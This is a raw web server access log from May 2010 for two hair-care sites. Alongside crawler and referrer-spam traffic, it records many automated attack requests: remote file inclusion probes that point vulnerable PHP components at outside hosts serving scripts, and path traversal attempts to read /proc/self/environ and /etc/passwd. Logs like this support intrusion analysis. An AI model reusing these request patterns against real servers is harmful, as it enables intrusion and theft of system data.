121.190.102.21 - - [16/May/2010:23:12:55 -0700] "GET /logs/?_zb_path=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 200 5371 "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.190.102.21 - - [16/May/2010:23:12:55 -0700] "GET /logs/access.log%20%20/?_zb_path=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.190.102.21 - - [16/May/2010:23:12:55 -0700] "GET /?_zb_path=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "www.freehairsecrets.com"
91.121.71.175 - - [16/May/2010:23:13:53 -0700] "GET /logs/access_100405.log//skin/uks_gallery_v3010/write.php?dir=http://forum.c4evn.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.71.175 - - [16/May/2010:23:14:55 -0700] "GET /logs/access_100405.log//skin/uks_gallery_v3010/write.php?dir=http://forum.c4evn.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.2 - - [16/May/2010:23:20:30 -0700] "GET /logs/access_100405.log//skin/uks_gallery_v3010/write.php?dir=http://forum.c4evn.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
112.78.8.20 - - [16/May/2010:23:20:34 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
112.78.8.20 - - [16/May/2010:23:20:57 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
77.221.130.2 - - [16/May/2010:23:25:56 -0700] "GET /logs/access_100405.log//skin/uks_gallery_v3010/write.php?dir=http://forum.c4evn.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
198.170.141.58 - - [16/May/2010:23:33:53 -0700] "GET /logs/access_100405.log/index.php?option=com_artforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
198.170.141.58 - - [16/May/2010:23:33:53 -0700] "GET /index.php?option=com_artforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
198.170.141.58 - - [16/May/2010:23:33:53 -0700] "GET /logs/index.php?option=com_artforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
211.232.85.247 - - [16/May/2010:23:33:54 -0700] "GET /logs/access_100503.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://liceum3.ru/help/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
211.232.85.247 - - [16/May/2010:23:33:55 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://liceum3.ru/help/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
211.232.85.247 - - [16/May/2010:23:33:57 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://liceum3.ru/help/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.218.116.134 - - [16/May/2010:23:39:03 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "freehairsecrets.com"
91.212.226.210 - - [16/May/2010:23:42:35 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "growlonghairfast.com"
91.212.226.210 - - [16/May/2010:23:42:35 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "growlonghairfast.com"
195.191.40.17 - - [16/May/2010:23:47:17 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.76 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
195.191.40.17 - - [16/May/2010:23:47:17 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.76 [en] (Windows NT 5.0; U)" "growlonghairfast.com"
222.231.49.196 - - [16/May/2010:23:50:04 -0700] "GET /index.php?option=com_artforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.212.226.210 - - [16/May/2010:23:52:35 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "freehairsecrets.com"
91.212.226.210 - - [16/May/2010:23:52:35 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "freehairsecrets.com"
119.63.198.107 - - [16/May/2010:23:53:53 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12024 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.freehairsecrets.com"
119.63.198.84 - - [16/May/2010:23:56:11 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12075 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.freehairsecrets.com"
208.43.194.3 - - [16/May/2010:23:57:29 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.43.194.3 - - [16/May/2010:23:57:29 -0700] "GET /components/com_flyspray/startdown.php?file=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.43.194.3 - - [16/May/2010:23:57:30 -0700] "GET /logs/access.log%20%20//components/com_flyspray/startdown.php?file=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
119.63.198.117 - - [16/May/2010:23:58:33 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12079 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.freehairsecrets.com"
119.63.198.116 - - [17/May/2010:00:00:28 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12080 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "www.freehairsecrets.com"
77.88.25.28 - - [17/May/2010:00:01:25 -0700] "GET /logs/access_091130.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:00:01:38 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13177 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
174.120.18.66 - - [17/May/2010:00:03:06 -0700] "HEAD / HTTP/1.1" 200 0 "http://naturalhairremedies.info" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)" "www.freehairsecrets.com"
195.191.40.17 - - [17/May/2010:00:03:56 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "freehairsecrets.com"
195.191.40.17 - - [17/May/2010:00:03:56 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "freehairsecrets.com"
208.43.194.3 - - [17/May/2010:00:06:04 -0700] "GET /logs/access_100405.log%20%20//components/com_flyspray/startdown.php?file=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:00:06:04 -0700] "GET /components/com_flyspray/startdown.php?file=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:00:06:04 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [17/May/2010:00:06:35 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
112.78.8.20 - - [17/May/2010:00:08:22 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
112.78.8.20 - - [17/May/2010:00:08:24 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
112.78.8.20 - - [17/May/2010:00:08:25 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
112.78.8.20 - - [17/May/2010:00:09:25 -0700] "GET /logs/access_100503.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
112.78.8.20 - - [17/May/2010:00:09:26 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
112.78.8.20 - - [17/May/2010:00:09:27 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
112.78.8.20 - - [17/May/2010:00:11:29 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
112.78.8.20 - - [17/May/2010:00:11:30 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
112.78.8.20 - - [17/May/2010:00:11:33 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
112.78.8.20 - - [17/May/2010:00:11:34 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
112.78.8.20 - - [17/May/2010:00:11:35 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
112.78.8.20 - - [17/May/2010:00:11:42 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
89.111.176.22 - - [17/May/2010:00:15:22 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
149.31.6.24 - - [17/May/2010:00:15:24 -0700] "GET /logs/access.log/xmlrpc.php HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
149.31.6.24 - - [17/May/2010:00:15:25 -0700] "GET /xmlrpc.php HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
149.31.6.24 - - [17/May/2010:00:15:26 -0700] "GET /logs/xmlrpc.php HTTP/1.1" 404 - "-" "libwww-perl/5.823" "growlonghairfast.com"
220.181.7.28 - - [17/May/2010:00:15:51 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12573 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
89.111.176.22 - - [17/May/2010:00:19:25 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
67.195.112.151 - - [17/May/2010:00:21:27 -0700] "GET /logs/access_100412.log HTTP/1.0" 200 2139776 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
211.232.85.247 - - [17/May/2010:00:22:16 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://liceum3.ru/help/sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [17/May/2010:00:22:16 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://liceum3.ru/help/sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [17/May/2010:00:22:16 -0700] "GET /logs/access_100405.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://liceum3.ru/help/sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
222.231.49.196 - - [17/May/2010:00:29:14 -0700] "GET /logs/access_100405.log/index.php?option=com_artforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
222.231.49.196 - - [17/May/2010:00:29:14 -0700] "GET /index.php?option=com_artforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
222.231.49.196 - - [17/May/2010:00:29:15 -0700] "GET /logs/index.php?option=com_artforms&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
208.80.193.36 - - [17/May/2010:00:31:35 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727; InfoPath.1)" "www.freehairsecrets.com"
91.212.226.240 - - [17/May/2010:00:39:14 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible- MSIE 6.0- Windows NT 5.1- SV1- .NET CLR 1.1.4322" "growlonghairfast.com"
91.212.226.240 - - [17/May/2010:00:39:14 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible- MSIE 6.0- Windows NT 5.1- SV1- .NET CLR 1.1.4322" "growlonghairfast.com"
74.50.85.15 - - [17/May/2010:00:42:10 -0700] "GET /?spaw_root=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [17/May/2010:00:42:10 -0700] "GET /logs/access_100503.log%20%20/?spaw_root=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
74.50.85.15 - - [17/May/2010:00:42:11 -0700] "GET /logs/?spaw_root=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 200 5371 "-" "Mozilla/5.0" "growlonghairfast.com"
174.142.214.4 - - [17/May/2010:00:43:18 -0700] "GET /logs/access_100315.log%20%20//?_zb_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.142.214.4 - - [17/May/2010:00:43:18 -0700] "GET /?_zb_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
174.142.214.4 - - [17/May/2010:00:43:18 -0700] "GET /logs//?_zb_path=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 5376 "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [17/May/2010:00:47:57 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [17/May/2010:00:47:57 -0700] "GET /logs/access_100329.log%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [17/May/2010:00:47:57 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 200 5376 "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [17/May/2010:00:48:07 -0700] "GET /?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [17/May/2010:00:48:07 -0700] "GET /logs//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 200 5376 "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [17/May/2010:00:48:07 -0700] "GET /logs/access_100329.log%20%20//?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.212.226.240 - - [17/May/2010:00:49:26 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "freehairsecrets.com"
91.212.226.240 - - [17/May/2010:00:49:26 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "freehairsecrets.com"
89.111.176.22 - - [17/May/2010:00:50:30 -0700] "GET /logs/access_100412.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
89.111.176.22 - - [17/May/2010:00:50:31 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
89.111.176.22 - - [17/May/2010:00:50:31 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
74.50.85.15 - - [17/May/2010:00:52:54 -0700] "GET /logs/access_100503.log/?spaw_root=http://www.mjc.kg.kr//eat_file/.../head.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.111.176.22 - - [17/May/2010:00:53:50 -0700] "GET /logs/access_100419.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
184.73.46.65 - - [17/May/2010:01:01:17 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "www.freehairsecrets.com"
184.73.46.65 - - [17/May/2010:01:01:18 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14946 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "www.freehairsecrets.com"
211.245.21.109 - - [17/May/2010:01:05:39 -0700] "GET /index.php?option=com_glossary&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
193.105.210.155 - - [17/May/2010:01:09:58 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://www.freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.freehairsecrets.com"
193.105.210.155 - - [17/May/2010:01:09:58 -0700] "GET / HTTP/1.0" 200 910 "http://www.freehairsecrets.com/" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.freehairsecrets.com"
58.125.181.214 - - [17/May/2010:01:12:59 -0700] "GET /logs/access_100125.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.125.181.214 - - [17/May/2010:01:12:59 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.125.181.214 - - [17/May/2010:01:13:00 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
58.125.181.214 - - [17/May/2010:01:16:08 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.125.181.214 - - [17/May/2010:01:16:08 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
58.125.181.214 - - [17/May/2010:01:16:13 -0700] "GET /logs/access.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://alaindaloz.fr//baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
85.17.137.64 - - [17/May/2010:01:22:54 -0700] "GET /logs/access_100419.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.17.137.64 - - [17/May/2010:01:22:55 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.17.137.64 - - [17/May/2010:01:22:55 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:01:23:23 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15167 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
85.17.137.64 - - [17/May/2010:01:24:11 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.17.137.64 - - [17/May/2010:01:24:11 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.17.137.64 - - [17/May/2010:01:24:11 -0700] "GET /logs/access_100419.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.117.175.33 - - [17/May/2010:01:26:55 -0700] "GET /freehairsecretsphp/viewtopic.php?p=631&sid=0bbdde56fc1c8631ab837793a5241ad3 HTTP/1.0" 200 438 "http://growlonghairfast.com/freehairsecretsphp/viewtopic.php?p=631&sid=0bbdde56fc1c8631ab837793a5241ad3" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.6 (build 01425))" "growlonghairfast.com"
212.117.175.33 - - [17/May/2010:01:27:02 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; MRA 4.6 (build 01425))" "growlonghairfast.com"
87.252.3.123 - - [17/May/2010:01:28:40 -0700] "GET /logs/access_100201.log/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kereosbois.fr//components/com_artforms/assets/captcha/includes/captchaform/id.jpg?? HTTP/1.0" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
87.252.3.123 - - [17/May/2010:01:28:40 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.kereosbois.fr//components/com_artforms/assets/captcha/includes/captchaform/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
